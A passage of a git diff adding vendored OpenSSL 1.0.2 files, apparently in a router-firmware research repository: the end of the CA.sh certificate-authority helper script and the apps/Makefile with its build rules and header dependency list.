+    $REQ -new -keyout newkey.pem -out newreq.pem $DAYS
+    RET=$?
+    echo "Request is in newreq.pem, private key is in newkey.pem"
+    ;;
+-newreq-nodes) 
+    # create a certificate request
+    $REQ -new -nodes -keyout newreq.pem -out newreq.pem $DAYS
+    RET=$?
+    echo "Request (and private key) is in newreq.pem"
+    ;;
+-newca)
+    # if explicitly asked for or it doesn't exist then setup the directory
+    # structure that Eric likes to manage things
+    NEW="1"
+    if [ "$NEW" -o ! -f ${CATOP}/serial ]; then
+	# create the directory hierarchy
+	mkdir -p ${CATOP}
+	mkdir -p ${CATOP}/certs
+	mkdir -p ${CATOP}/crl
+	mkdir -p ${CATOP}/newcerts
+	mkdir -p ${CATOP}/private
+	touch ${CATOP}/index.txt
+    fi
+    if [ ! -f ${CATOP}/private/$CAKEY ]; then
+	echo "CA certificate filename (or enter to create)"
+	read FILE
+
+	# ask user for existing CA certificate
+	if [ "$FILE" ]; then
+	    cp_pem $FILE ${CATOP}/private/$CAKEY PRIVATE
+	    cp_pem $FILE ${CATOP}/$CACERT CERTIFICATE
+	    RET=$?
+	    if [ ! -f "${CATOP}/serial" ]; then
+		$X509 -in ${CATOP}/$CACERT -noout -next_serial \
+		      -out ${CATOP}/serial
+	    fi
+	else
+	    echo "Making CA certificate ..."
+	    $REQ -new -keyout ${CATOP}/private/$CAKEY \
+			   -out ${CATOP}/$CAREQ
+	    $CA -create_serial -out ${CATOP}/$CACERT $CADAYS -batch \
+			   -keyfile ${CATOP}/private/$CAKEY -selfsign \
+			   -extensions v3_ca \
+			   -infiles ${CATOP}/$CAREQ
+	    RET=$?
+	fi
+    fi
+    ;;
+-xsign)
+    $CA -policy policy_anything -infiles newreq.pem
+    RET=$?
+    ;;
+-pkcs12)
+    if [ -z "$2" ] ; then
+	CNAME="My Certificate"
+    else
+	CNAME="$2"
+    fi
+    $PKCS12 -in newcert.pem -inkey newreq.pem -certfile ${CATOP}/$CACERT \
+	    -out newcert.p12 -export -name "$CNAME"
+    RET=$?
+    exit $RET
+    ;;
+-sign|-signreq)
+    $CA -policy policy_anything -out newcert.pem -infiles newreq.pem
+    RET=$?
+    cat newcert.pem
+    echo "Signed certificate is in newcert.pem"
+    ;;
+-signCA)
+    $CA -policy policy_anything -out newcert.pem -extensions v3_ca -infiles newreq.pem
+    RET=$?
+    echo "Signed CA certificate is in newcert.pem"
+    ;;
+-signcert)
+    echo "Cert passphrase will be requested twice - bug?"
+    $X509 -x509toreq -in newreq.pem -signkey newreq.pem -out tmp.pem
+    $CA -policy policy_anything -out newcert.pem -infiles tmp.pem
+    RET=$?
+    cat newcert.pem
+    echo "Signed certificate is in newcert.pem"
+    ;;
+-verify)
+    shift
+    if [ -z "$1" ]; then
+	    $VERIFY -CAfile $CATOP/$CACERT newcert.pem
+	    RET=$?
+    else
+	for j
+	do
+	    $VERIFY -CAfile $CATOP/$CACERT $j
+	    if [ $? != 0 ]; then
+		    RET=$?
+	    fi
+	done
+    fi
+    exit $RET
+    ;;
+*)
+    echo "Unknown arg $i" >&2
+    usage
+    exit 1
+    ;;
+esac
+shift
+done
+exit $RET
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/Makefile b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/Makefile
new file mode 100644
index 0000000..d71d328
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/Makefile
@@ -0,0 +1,903 @@
+#
+#  apps/Makefile
+#
+
+DIR=		apps
+TOP=		..
+CC=		cc
+INCLUDES=	-I$(TOP) -I../include $(KRB5_INCLUDES)
+CFLAG=		-g -static
+MAKEFILE=	Makefile
+PERL=		perl
+RM=		rm -f
+# KRB5 stuff
+KRB5_INCLUDES=
+LIBKRB5=
+
+PEX_LIBS=
+EX_LIBS= 
+EXE_EXT= 
+
+SHLIB_TARGET=
+
+CFLAGS= -DMONOLITH $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile makeapps.com install.com
+
+DLIBCRYPTO=../libcrypto.a
+DLIBSSL=../libssl.a
+LIBCRYPTO=-L.. -lcrypto
+LIBSSL=-L.. -lssl
+
+PROGRAM= openssl
+
+SCRIPTS=CA.sh CA.pl tsget
+
+EXE= $(PROGRAM)$(EXE_EXT)
+
+E_EXE=	verify asn1pars req dgst dh dhparam enc passwd gendh errstr \
+	ca crl rsa rsautl dsa dsaparam ec ecparam \
+	x509 genrsa gendsa genpkey s_server s_client speed \
+	s_time version pkcs7 cms crl2pkcs7 sess_id ciphers nseq pkcs12 \
+	pkcs8 pkey pkeyparam pkeyutl spkac smime rand engine ocsp prime ts srp
+
+PROGS= $(PROGRAM).c
+
+A_OBJ=apps.o
+A_SRC=apps.c
+S_OBJ=	s_cb.o s_socket.o
+S_SRC=	s_cb.c s_socket.c
+RAND_OBJ=app_rand.o
+RAND_SRC=app_rand.c
+
+E_OBJ=	verify.o asn1pars.o req.o dgst.o dh.o dhparam.o enc.o passwd.o gendh.o errstr.o \
+	ca.o pkcs7.o crl2p7.o crl.o \
+	rsa.o rsautl.o dsa.o dsaparam.o ec.o ecparam.o \
+	x509.o genrsa.o gendsa.o genpkey.o s_server.o s_client.o speed.o \
+	s_time.o $(A_OBJ) $(S_OBJ) $(RAND_OBJ) version.o sess_id.o \
+	ciphers.o nseq.o pkcs12.o pkcs8.o pkey.o pkeyparam.o pkeyutl.o \
+	spkac.o smime.o cms.o rand.o engine.o ocsp.o prime.o ts.o srp.o
+
+E_SRC=	verify.c asn1pars.c req.c dgst.c dh.c enc.c passwd.c gendh.c errstr.c ca.c \
+	pkcs7.c crl2p7.c crl.c \
+	rsa.c rsautl.c dsa.c dsaparam.c ec.c ecparam.c \
+	x509.c genrsa.c gendsa.c genpkey.c s_server.c s_client.c speed.c \
+	s_time.c $(A_SRC) $(S_SRC) $(RAND_SRC) version.c sess_id.c \
+	ciphers.c nseq.c pkcs12.c pkcs8.c pkey.c pkeyparam.c pkeyutl.c \
+	spkac.c smime.c cms.c rand.c engine.c ocsp.c prime.c ts.c srp.c
+
+SRC=$(E_SRC)
+
+EXHEADER=
+HEADER=	apps.h progs.h s_apps.h \
+	testdsa.h testrsa.h \
+	$(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	@(cd ..; $(MAKE) DIRS=$(DIR) all)
+
+all:	exe
+
+exe:	$(EXE)
+
+req: sreq.o $(A_OBJ) $(DLIBCRYPTO)
+	shlib_target=; if [ -n "$(SHARED_LIBS)" ]; then \
+		shlib_target="$(SHLIB_TARGET)"; \
+	fi; \
+	$(MAKE) -f $(TOP)/Makefile.shared -e \
+		APPNAME=req OBJECTS="sreq.o $(A_OBJ) $(RAND_OBJ)" \
+		LIBDEPS="$(PEX_LIBS) $(LIBCRYPTO) $(EX_LIBS)" \
+		link_app.$${shlib_target}
+
+sreq.o: req.c 
+	$(CC) -c $(INCLUDES) $(CFLAG) -o sreq.o req.c
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@set -e; for i in $(EXE); \
+	do  \
+	(echo installing $$i; \
+	 cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/bin/$$i.new; \
+	 chmod 755 $(INSTALL_PREFIX)$(INSTALLTOP)/bin/$$i.new; \
+	 mv -f $(INSTALL_PREFIX)$(INSTALLTOP)/bin/$$i.new $(INSTALL_PREFIX)$(INSTALLTOP)/bin/$$i ); \
+	 done;
+	@set -e; for i in $(SCRIPTS); \
+	do  \
+	(echo installing $$i; \
+	 cp $$i $(INSTALL_PREFIX)$(OPENSSLDIR)/misc/$$i.new; \
+	 chmod 755 $(INSTALL_PREFIX)$(OPENSSLDIR)/misc/$$i.new; \
+	 mv -f $(INSTALL_PREFIX)$(OPENSSLDIR)/misc/$$i.new $(INSTALL_PREFIX)$(OPENSSLDIR)/misc/$$i ); \
+	 done
+	@cp openssl.cnf $(INSTALL_PREFIX)$(OPENSSLDIR)/openssl.cnf.new; \
+	chmod 644 $(INSTALL_PREFIX)$(OPENSSLDIR)/openssl.cnf.new; \
+	mv -f  $(INSTALL_PREFIX)$(OPENSSLDIR)/openssl.cnf.new $(INSTALL_PREFIX)$(OPENSSLDIR)/openssl.cnf
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+links:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@if [ -z "$(THIS)" ]; then \
+	    $(MAKE) -f $(TOP)/Makefile reflect THIS=$@; \
+	else \
+	    $(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(SRC); \
+	fi
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+	rm -f CA.pl
+
+clean:
+	rm -f *.o *.obj *.dll lib tags core .pure .nfs* *.old *.bak fluff $(EXE)
+	rm -f req
+
+$(DLIBSSL):
+	(cd ..; $(MAKE) DIRS=ssl all)
+
+$(DLIBCRYPTO):
+	(cd ..; $(MAKE) DIRS=crypto all)
+
+$(EXE): progs.h $(E_OBJ) $(PROGRAM).o $(DLIBCRYPTO) $(DLIBSSL)
+	$(RM) $(EXE)
+	shlib_target=; if [ -n "$(SHARED_LIBS)" ]; then \
+		shlib_target="$(SHLIB_TARGET)"; \
+	elif [ -n "$(FIPSCANLIB)" ]; then \
+	  FIPSLD_CC="$(CC)"; CC=$(FIPSDIR)/bin/fipsld; export CC FIPSLD_CC; \
+	fi; \
+	LIBRARIES="$(LIBSSL) $(LIBKRB5) $(LIBCRYPTO)" ; \
+	$(MAKE) -f $(TOP)/Makefile.shared -e \
+		APPNAME=$(EXE) OBJECTS="$(PROGRAM).o $(E_OBJ)" \
+		LIBDEPS="$(PEX_LIBS) $$LIBRARIES $(EX_LIBS)" \
+		link_app.$${shlib_target}
+	@(cd ..; $(MAKE) rehash)
+
+progs.h: progs.pl
+	$(PERL) progs.pl $(E_EXE) >progs.h
+	$(RM) $(PROGRAM).o
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+app_rand.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+app_rand.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+app_rand.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+app_rand.o: ../include/openssl/evp.h ../include/openssl/lhash.h
+app_rand.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+app_rand.o: ../include/openssl/ocsp.h ../include/openssl/opensslconf.h
+app_rand.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+app_rand.o: ../include/openssl/pkcs7.h ../include/openssl/rand.h
+app_rand.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+app_rand.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+app_rand.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+app_rand.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h
+app_rand.o: app_rand.c apps.h
+apps.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+apps.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+apps.o: ../include/openssl/conf.h ../include/openssl/crypto.h
+apps.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+apps.o: ../include/openssl/evp.h ../include/openssl/lhash.h
+apps.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+apps.o: ../include/openssl/ocsp.h ../include/openssl/opensslconf.h
+apps.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+apps.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+apps.o: ../include/openssl/pkcs12.h ../include/openssl/pkcs7.h
+apps.o: ../include/openssl/rsa.h ../include/openssl/safestack.h
+apps.o: ../include/openssl/sha.h ../include/openssl/stack.h
+apps.o: ../include/openssl/symhacks.h ../include/openssl/txt_db.h
+apps.o: ../include/openssl/ui.h ../include/openssl/x509.h
+apps.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.c apps.h
+asn1pars.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+asn1pars.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+asn1pars.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+asn1pars.o: ../include/openssl/err.h ../include/openssl/evp.h
+asn1pars.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+asn1pars.o: ../include/openssl/objects.h ../include/openssl/ocsp.h
+asn1pars.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+asn1pars.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+asn1pars.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+asn1pars.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+asn1pars.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+asn1pars.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+asn1pars.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h
+asn1pars.o: asn1pars.c
+ca.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+ca.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+ca.o: ../include/openssl/conf.h ../include/openssl/crypto.h
+ca.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+ca.o: ../include/openssl/evp.h ../include/openssl/lhash.h
+ca.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+ca.o: ../include/openssl/ocsp.h ../include/openssl/opensslconf.h
+ca.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+ca.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+ca.o: ../include/openssl/pkcs7.h ../include/openssl/safestack.h
+ca.o: ../include/openssl/sha.h ../include/openssl/stack.h
+ca.o: ../include/openssl/symhacks.h ../include/openssl/txt_db.h
+ca.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h
+ca.o: ../include/openssl/x509v3.h apps.h ca.c
+ciphers.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+ciphers.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+ciphers.o: ../include/openssl/crypto.h ../include/openssl/dtls1.h
+ciphers.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+ciphers.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+ciphers.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+ciphers.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+ciphers.o: ../include/openssl/ocsp.h ../include/openssl/opensslconf.h
+ciphers.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+ciphers.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+ciphers.o: ../include/openssl/pkcs7.h ../include/openssl/pqueue.h
+ciphers.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+ciphers.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+ciphers.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+ciphers.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+ciphers.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+ciphers.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+ciphers.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h
+ciphers.o: ciphers.c
+cms.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+cms.o: ../include/openssl/buffer.h ../include/openssl/cms.h
+cms.o: ../include/openssl/conf.h ../include/openssl/crypto.h
+cms.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+cms.o: ../include/openssl/evp.h ../include/openssl/lhash.h
+cms.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+cms.o: ../include/openssl/ocsp.h ../include/openssl/opensslconf.h
+cms.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+cms.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+cms.o: ../include/openssl/pkcs7.h ../include/openssl/safestack.h
+cms.o: ../include/openssl/sha.h ../include/openssl/stack.h
+cms.o: ../include/openssl/symhacks.h ../include/openssl/txt_db.h
+cms.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h
+cms.o: ../include/openssl/x509v3.h apps.h cms.c
+crl.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+crl.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+crl.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+crl.o: ../include/openssl/err.h ../include/openssl/evp.h
+crl.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+crl.o: ../include/openssl/objects.h ../include/openssl/ocsp.h
+crl.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+crl.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+crl.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+crl.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+crl.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+crl.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+crl.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h crl.c
+crl2p7.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+crl2p7.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+crl2p7.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+crl2p7.o: ../include/openssl/err.h ../include/openssl/evp.h
+crl2p7.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+crl2p7.o: ../include/openssl/objects.h ../include/openssl/ocsp.h
+crl2p7.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+crl2p7.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+crl2p7.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+crl2p7.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+crl2p7.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+crl2p7.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+crl2p7.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h
+crl2p7.o: crl2p7.c
+dgst.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+dgst.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+dgst.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+dgst.o: ../include/openssl/err.h ../include/openssl/evp.h
+dgst.o: ../include/openssl/hmac.h ../include/openssl/lhash.h
+dgst.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+dgst.o: ../include/openssl/ocsp.h ../include/openssl/opensslconf.h
+dgst.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+dgst.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+dgst.o: ../include/openssl/pkcs7.h ../include/openssl/safestack.h
+dgst.o: ../include/openssl/sha.h ../include/openssl/stack.h
+dgst.o: ../include/openssl/symhacks.h ../include/openssl/txt_db.h
+dgst.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h
+dgst.o: ../include/openssl/x509v3.h apps.h dgst.c
+dh.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+dh.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+dh.o: ../include/openssl/conf.h ../include/openssl/crypto.h
+dh.o: ../include/openssl/dh.h ../include/openssl/e_os2.h
+dh.o: ../include/openssl/err.h ../include/openssl/evp.h
+dh.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+dh.o: ../include/openssl/objects.h ../include/openssl/ocsp.h
+dh.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+dh.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+dh.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+dh.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+dh.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+dh.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+dh.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h dh.c
+dsa.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+dsa.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+dsa.o: ../include/openssl/conf.h ../include/openssl/crypto.h
+dsa.o: ../include/openssl/dh.h ../include/openssl/dsa.h
+dsa.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+dsa.o: ../include/openssl/evp.h ../include/openssl/lhash.h
+dsa.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+dsa.o: ../include/openssl/ocsp.h ../include/openssl/opensslconf.h
+dsa.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+dsa.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+dsa.o: ../include/openssl/pkcs7.h ../include/openssl/safestack.h
+dsa.o: ../include/openssl/sha.h ../include/openssl/stack.h
+dsa.o: ../include/openssl/symhacks.h ../include/openssl/txt_db.h
+dsa.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h
+dsa.o: ../include/openssl/x509v3.h apps.h dsa.c
+dsaparam.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+dsaparam.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+dsaparam.o: ../include/openssl/conf.h ../include/openssl/crypto.h
+dsaparam.o: ../include/openssl/dh.h ../include/openssl/dsa.h
+dsaparam.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+dsaparam.o: ../include/openssl/evp.h ../include/openssl/lhash.h
+dsaparam.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+dsaparam.o: ../include/openssl/ocsp.h ../include/openssl/opensslconf.h
+dsaparam.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+dsaparam.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+dsaparam.o: ../include/openssl/pkcs7.h ../include/openssl/safestack.h
+dsaparam.o: ../include/openssl/sha.h ../include/openssl/stack.h
+dsaparam.o: ../include/openssl/symhacks.h ../include/openssl/txt_db.h
+dsaparam.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h
+dsaparam.o: ../include/openssl/x509v3.h apps.h dsaparam.c
+ec.o: ../include/openssl/opensslconf.h ec.c
+ecparam.o: ../include/openssl/opensslconf.h ecparam.c
+enc.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+enc.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+enc.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+enc.o: ../include/openssl/err.h ../include/openssl/evp.h
+enc.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+enc.o: ../include/openssl/objects.h ../include/openssl/ocsp.h
+enc.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+enc.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+enc.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+enc.o: ../include/openssl/rand.h ../include/openssl/safestack.h
+enc.o: ../include/openssl/sha.h ../include/openssl/stack.h
+enc.o: ../include/openssl/symhacks.h ../include/openssl/txt_db.h
+enc.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h
+enc.o: ../include/openssl/x509v3.h apps.h enc.c
+engine.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+engine.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+engine.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+engine.o: ../include/openssl/err.h ../include/openssl/evp.h
+engine.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+engine.o: ../include/openssl/objects.h ../include/openssl/ocsp.h
+engine.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+engine.o: ../include/openssl/ossl_typ.h ../include/openssl/pkcs7.h
+engine.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+engine.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+engine.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+engine.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h
+engine.o: engine.c
+errstr.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+errstr.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+errstr.o: ../include/openssl/crypto.h ../include/openssl/dtls1.h
+errstr.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+errstr.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+errstr.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+errstr.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+errstr.o: ../include/openssl/ocsp.h ../include/openssl/opensslconf.h
+errstr.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+errstr.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+errstr.o: ../include/openssl/pkcs7.h ../include/openssl/pqueue.h
+errstr.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+errstr.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+errstr.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+errstr.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+errstr.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+errstr.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+errstr.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h
+errstr.o: errstr.c
+gendh.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+gendh.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+gendh.o: ../include/openssl/conf.h ../include/openssl/crypto.h
+gendh.o: ../include/openssl/dh.h ../include/openssl/e_os2.h
+gendh.o: ../include/openssl/err.h ../include/openssl/evp.h
+gendh.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+gendh.o: ../include/openssl/objects.h ../include/openssl/ocsp.h
+gendh.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+gendh.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+gendh.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+gendh.o: ../include/openssl/rand.h ../include/openssl/safestack.h
+gendh.o: ../include/openssl/sha.h ../include/openssl/stack.h
+gendh.o: ../include/openssl/symhacks.h ../include/openssl/txt_db.h
+gendh.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h
+gendh.o: ../include/openssl/x509v3.h apps.h gendh.c
+gendsa.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+gendsa.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+gendsa.o: ../include/openssl/conf.h ../include/openssl/crypto.h
+gendsa.o: ../include/openssl/dh.h ../include/openssl/dsa.h
+gendsa.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+gendsa.o: ../include/openssl/evp.h ../include/openssl/lhash.h
+gendsa.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+gendsa.o: ../include/openssl/ocsp.h ../include/openssl/opensslconf.h
+gendsa.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+gendsa.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+gendsa.o: ../include/openssl/pkcs7.h ../include/openssl/safestack.h
+gendsa.o: ../include/openssl/sha.h ../include/openssl/stack.h
+gendsa.o: ../include/openssl/symhacks.h ../include/openssl/txt_db.h
+gendsa.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h
+gendsa.o: ../include/openssl/x509v3.h apps.h gendsa.c
+genpkey.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+genpkey.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+genpkey.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+genpkey.o: ../include/openssl/err.h ../include/openssl/evp.h
+genpkey.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+genpkey.o: ../include/openssl/objects.h ../include/openssl/ocsp.h
+genpkey.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+genpkey.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+genpkey.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+genpkey.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+genpkey.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+genpkey.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+genpkey.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h
+genpkey.o: genpkey.c
+genrsa.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+genrsa.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+genrsa.o: ../include/openssl/conf.h ../include/openssl/crypto.h
+genrsa.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+genrsa.o: ../include/openssl/evp.h ../include/openssl/lhash.h
+genrsa.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+genrsa.o: ../include/openssl/ocsp.h ../include/openssl/opensslconf.h
+genrsa.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+genrsa.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+genrsa.o: ../include/openssl/pkcs7.h ../include/openssl/rand.h
+genrsa.o: ../include/openssl/rsa.h ../include/openssl/safestack.h
+genrsa.o: ../include/openssl/sha.h ../include/openssl/stack.h
+genrsa.o: ../include/openssl/symhacks.h ../include/openssl/txt_db.h
+genrsa.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h
+genrsa.o: ../include/openssl/x509v3.h apps.h genrsa.c
+nseq.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
